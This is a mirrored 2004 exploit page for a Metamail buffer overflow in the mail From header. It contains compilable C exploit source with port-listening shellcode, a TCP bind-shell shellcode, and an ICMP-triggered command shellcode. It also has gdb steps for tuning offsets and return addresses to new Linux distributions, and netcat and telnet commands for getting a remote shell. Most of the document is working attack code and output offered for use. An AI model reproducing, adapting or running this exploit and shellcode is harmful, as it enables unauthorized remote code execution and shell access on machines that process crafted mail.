Metamail Buffer Overflow Exploit(From Header)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Metamail Buffer Overflow Exploit(From Header)

来源：vfocus.net 作者：gloomy 发布时间：2004-06-07

Metamail Buffer Overflow Exploit (From Header)

How to use this exploit?
This exploit exploits the Metamail buffer overflow vulnerability. Thanks to Ulf Harnhammer for the proof of concept exploit. Compile it with:
- gcc metaexpl.c -o metaexpl

And launch it with
- ./metaexpl align retaddr

The output is a specially crafted mail. Pipe it to a file and launch Metamail.

Example:
- ./metaexpl 0 0x8054050 > mail
- metamail mail

If you have the correct align and return address. You should have an open UDP port at 13330. Search for it with:
- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State
- udp 0 0 *:13330 *:*

Now you can send your shellcode to port 13330, priest added two shellcodes to my exploit. One is a port bind TCP port 65535 code and the other code use ICMP and the ping utility to launch code. You can send it with:
- cat bindsockshc | netcat -u yourip 13330

Or
- cat icmpshc | netcat -u yourip 13330

Now telnet to IP address and port 65535 if, you use bind shellcode:
- telnet ipaddr 65535
- Trying ::1...
- telnet: connect to address ::1: Connection refused
- Trying 127.0.0.1...
- Connected to localhost.
- Escape character is '^]'.
- id;
- uid=100(hack) gid=100(users) groups=100(users)
- : command not found

For ICMP shellcode look at icmp.c file in this package.

How can i find the correct offset for other Linux distributions?
Align 0 and Return address 0x8054050 works for German SUSE Linux 7.0. The target is in the file "targets" in this package. Please send me the targets of your Linux distributions. If you want to exploit another distribution, you need another align and return address. Launch exploit with align 0 and any return address.

- ./metaexpl 1 0x41424344 > /tmp/mail

Now open gdb with Metamail executable and launch it with mail

- gdb metamail
- (gdb)
- (gdb) r mail
- Starting program: /usr/bin/metamail mail

- Program received signal SIGSEGV, Segmentation fault.
- 0x68726979 in ?? ()

You have the wrong offset. Switch to another terminal and create a new mail with another offset. Positive and negative values are allowed.

- ./metaexpl 2 0x41424344 > /tmp/mail

Now in gdb:
- (gdb) r mail
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /usr/bin/metamail mail

- Program received signal SIGSEGV, Segmentation fault.
- 0x61626364 in ?? ()
- (gdb)

Now we have the correct offset (ABCD is normally \x41\x42\x43\x44 in hex, but Metamail adds 0x20 to it). Let's search for the return address (the return address is located at heap):
- maintenance info sections
- ...
- 0x08053080->0x08053450 at 0x0000a080: .data ALLOC LOAD DATA HAS_CONTENTS
- 0x08053450->0x08053454 at 0x0000a450: .eh_frame ALLOC LOAD DATA HAS_CONTENTS
- 0x08053454->0x0805345c at 0x0000a454: .ctors ALLOC LOAD DATA HAS_CONTENTS
- 0x0805345c->0x08053464 at 0x0000a45c: .dtors ALLOC LOAD DATA HAS_CONTENTS
- 0x08053464->0x08053558 at 0x0000a464: .got ALLOC LOAD DATA HAS_CONTENTS
- 0x08053558->0x080535f8 at 0x0000a558: .dynamic ALLOC LOAD DATA HAS_CONTENTS
- 0x08053600->0x08053e50 at 0x0000a600: .bss ALLOC
- 0x00000000->0x0000017c at 0x0000a600: .comment READONLY HAS_CONTENTS
- 0x08053e50->0x08053f18 at 0x0000a77c: .note READONLY HAS_CONTENTS
- ^^^^^^^^^^

Now search for the NOPs (The heap is after 0x08053f18):
- (gdb) x/1000x 0x08053f18
- 0x8053f18: 0x08053f68 0xffffffff 0xffffffff 0x00000000
- 0x8053f28: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f38: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f48: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f58: 0x00000000 0x00000000 0x00000000 0x400f5d80
- 0x8053f68: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f78: 0x00000000 0x00000000 0x00000000 0x000003f1
- 0x8053f88: 0x485f4d4d 0x45444145 0x0a3d5352 0x6d6f7246
- 0x8053f98: 0x3f3d203a 0x47474747 0x47474747 0x47474747
- 0x8053fa8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fb8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fc8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fd8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fe8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053ff8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8054008: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8054018: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8054028: 0x47474747 0x47474747 0x47474747 0x47474747
- ...

0x47474747 are the NOPs. All addresses with 0x47474747 are valid return addressees. Take an address in the middle of the NOP buffer. 0x8053fc8 is a good one for example. Ok, we have our values. We can exploit it:
- metaexpl 2 0x8053fc8 > /tmp/mail
- metamail /tmp/mail
- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State
- udp 0 0 *:13330 *:*

Exploit:
#include <stdio.h>

// Standard buffer size for vuln buffer
#define STDBUFSIZ 560

// Udp Port 13330 for shellcode
#define PORT "\x34\x12"

#define NOP 'G'

// Shellcode, which wait for another shellcode on udp port PORT and
// launch it. Special thanks to:
// ** gunzip@ircnet <techieone@softhome.net>
// ** http://members.xoom.it/gunzip
// for his wunderful shellcode.

char shellcode[]=
"\x31\xc0\x31\xdb\x43\x50\x6a\x02\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
"\x50\x89\xe1\xb3\x02\x6a\x66\x58\xcd\x80\x8b\x1c\x24\x99\x66\xba"
"\xff\xff\x29\xd4\x89\xe1\xb0\x03\xcd\x80\xff\xe1";

// Generate random nop data.
int gen_nops(char *buffer, int size)
{
int i, num;
FILE *file;

// Open urandom for srandom
file = fopen("/dev/urandom", "r");

// Iterate size times
for(i=0;i<size;i++)
{
// Read random data for srandom
num = fgetc(file);

// Set random number seed
srandom(num);

// Get random value
num = random() % 26;

// Add num to random value, to print always upper chars.
buffer[i] = 65 + num;
}

// close urandom
fclose(file);

return 0;
}

// Usage for wrong command line parameters
void usage(char *argv)
{
printf("\n%s align retaddr\n", argv);
}

// Start of the exploit
int main(int argc, char **argv)
{
char *buf;
char *p;
long *retaddr;
int align;
int i;

if(argc != 3)
{
usage(argv[0]);
exit(-1);
}

// Align and return address
align = atoi(argv[1]);
retaddr = strtoul(argv[2], 0, 0);

// Get memory for our vuln buffer
buf = (char*) malloc(STDBUFSIZ+align+1);

// Pointer to buf
p = buf;

// Set random nops (My last project. Use my function if you want,
// to evade Intrusion detection systems). If you want the whitepaper
// to the code, go to http://www.priestmaster.org/mypapers/nops.tgz
// gen_nops(buf, STDBUFSIZ+align+1);
memset(buf, NOP, STDBUFSIZ+align+1);

// Copy the shellcode into the buffer
memcpy(p+STDBUFSIZ-4-strlen(shellcode), shellcode, strlen(shellcode));

// Set return address
p += STDBUFSIZ+align-4;
*((void **)p) = (void *) retaddr;

// Null terminate
buf[STDBUFSIZ+align+1] = 0;

// Generate vuln mail
// Change this to your values if you want.
printf("From: =?");
printf("%s?Q?test_?= <metaur@localhost>\n", buf);
printf("To: <metaur@localhost>\n");
printf("Subject: Testmail 3: Message for you\n");
printf("MIME-Version: 1.0\n");
printf("Content-Type: text/whatever\n\n");
printf("Testmail 3");
}

bindsockshc.c:
/* Copyright (c) Ramon de Carvalho Valle July 2003 */
/* x86/linux bindsocketshellcode */

char shellcode[]= /* 72 bytes */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xf7\xe3" /* mull %ebx */
"\x53" /* pushl %ebx */
"\x43" /* incl %ebx */
"\x53" /* pushl %ebx */
"\x6a\x02" /* pushl $0x02 */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\xff\x49\x02" /* decl 0x02(%ecx) */
"\x6a\x10" /* pushl $0x10 */
"\x51" /* pushl %ecx */
"\x50" /* pushl %eax */
"\x89\xe1" /* movl %esp,%ecx */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x89\x41\x04" /* movl %eax,0x04(%ecx) */
"\xb3\x04" /* movb $0x04,%bl */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x93" /* xchgl %eax,%ebx */
"\xb0\x3f" /* movb $0x3f,%al */
"\xcd\x80" /* int $0x80 */
"\x49" /* decl %ecx */
"\x79\xf9" /* jns <bindsocketshellcode+45> */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;

main()
{
void (*dsr) ();
(long) dsr = &shellcode;
printf("Size: %d bytes.\n", sizeof(shellcode));
dsr();
}

icmpshc.c:
/*
x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org

[example]

main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
Size of shellcode = 137

main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
main:/home/gloomy/security/shellcode/linux/icmp# cat out
uid=0(root) gid=0(root) groups=0(root)
main:/home/gloomy/security/shellcode/linux/icmp#

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define SECRET_CHAR "\x99"

char shell[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
"\x43\x41\x51\xb1\x03\x51\x49\x51"
"\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
"\xcd\x80\x31\xdb\x39\xc3\x75\x55"
"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
"\xff\x54\x54\x53\x50\x55\x52\x89"
"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
"\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
"\xb0\x25\x01\xc5\xb0" SECRET_CHAR
"\x32\x45\xff\x75\xd5\xb0\x02\xcd"
"\x80\x31\xdb\x39\xc3\x74\x25\xeb"
"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
"\x06\xcd\x80\x5b\x89\xd9\x88\x43"
"\x07\x80\xc1\x08\x50\x55\x51\x53"
"\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
"\xff"
"/bin/sh -c";

void asm_code() {
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x66,%al
incl %ebx
incl %ecx
push %ecx
movb $0x3,%cl
push %ecx
decl %ecx
push %ecx
movl %esp,%ecx
int $0x80 /* socket(); */
movl %eax,%edx

movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
jne exit

endlessloop:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x10,%al
push %eax
movb $0xff,%al
push %esp
push %esp
push %ebx
push %eax
push %ebp
push %edx
movl %esp,%ecx
movb $0x66,%al
movb $0x0c,%bl
int $0x80 /* recvfrom(); */

movl %ebp,%ecx
addl %eax,%ecx
xorl %eax,%eax
movb %al,-2(%ecx)
movb $0x25,%al
addl %eax,%ebp
movb $0x99,%al /* SECRET_CHAR */
xorb -1(%ebp),%al
jnz endlessloop

movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
je stack
jmp endlessloop
execve:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x2,%bl
movb $0x6,%al
int $0x80 /* close(); */

pop %ebx
movl %ebx,%ecx
movb %al,0x7(%ebx)
addb $0x8,%cl
push %eax
push %ebp
push %ecx
push %ebx
movl %esp,%ecx
cdq
movb $0xb,%al
int $0x80 /* execve(); */
exit:
xorl %eax,%eax
incl %eax
int $0x80 /* exit(); */
stack:
call execve
.string \"/bin/sh -c\"

");
}

void c_code() {
int fd;
int nb = 0;
struct sockaddr_in them;
int them_size = sizeof(struct sockaddr);
char buf[256];
char *prog[] = {"/bin/sh","-c",&buf[37],NULL};

fd = socket(2,3,1);
if (fork() > 0) exit(0);
while (1) {
while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
buf[nb-1] = 0;
if (buf[36] == (char)SECRET_CHAR)
if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
}
}

int main(int c,char *v[]) {
void (*i)();
i = (void (*)())shell;
fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
i();
return 0;
}

[